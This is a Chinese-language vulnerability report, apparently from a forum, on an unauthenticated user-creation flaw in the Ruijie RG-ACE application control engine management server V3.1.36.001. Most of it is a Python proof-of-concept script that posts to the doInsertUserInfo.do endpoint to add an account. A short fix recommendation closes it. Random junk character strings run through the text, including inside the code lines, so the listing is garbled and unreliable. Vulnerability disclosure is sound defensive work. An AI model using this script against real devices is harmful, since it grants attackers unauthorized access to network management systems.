锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）


! s3 b. y- F" Z1 H) T! X: i9 r测试的具体版本是
产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
; b% ^+ h# Y* G编译时间: 201104291730
. i# C% \4 ?$ \; ]. ~" g: O" O
! \" Z& J. M5 Z4 v
6 r4 |" b9 Y$ @# T漏洞证明：


4 y* D/ X2 T* h4 j+ G- f# `2 q
8 g' `: ?: ~8 T
# B. G7 z9 c. |0 ]% s2 f

/ u+ G% p" s5 c+ h/ o8 k执行脚本
3 G6 N$ Z: M& d9 K#! /usr/bin/env python
#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
1 |4 O1 {" T' z+ w+ Himport urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
% N( O3 i# L( z2 e7 C3 `opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
& h  z" d8 h" Jopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
6 _, m0 d  T" U7 ?. L2 u; @3 g("useractionname","addButtonValue"),
5 F8 k/ i+ D0 B1 d& A* ~9 D& v7 ]0 z("useropermanager","userManager"),
# x9 A, p" i$ j) D("userName","t"), #######账号自己加
7 y3 S! o8 r/ `  z, J0 G3 J7 O("pwd","aaaaaa"),######密码自己加
- Z* G. J& ^. ^* a" o. ]("trueName","ad"),
("email",""),
("mobilePhone",""),
("officePhone",""),
: r4 x! V6 s; G$ h* m("addr",""),
# B  g- _% Z4 ?4 i("submit","确定"))
# r9 F  I! ~9 d, r; f. _+ Curllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
) ?! `0 H1 y7 E: D9 r( K) dprint "Done"

登录，连接设备

9 c4 l, _3 Q& ^
- A0 L: y3 l8 y; S
2 b' y5 B' {& K# I4 v& d# T. |
) o' ?7 `5 B! ~; A9 d% w
默认的管理员admin权限更大点


% q, X2 \" `7 r7 R

+ o. ^4 R) `- t% J. V+ T7 W
修复方案：
' q1 e$ t0 G2 P- j& j% t加强对接口的权限验证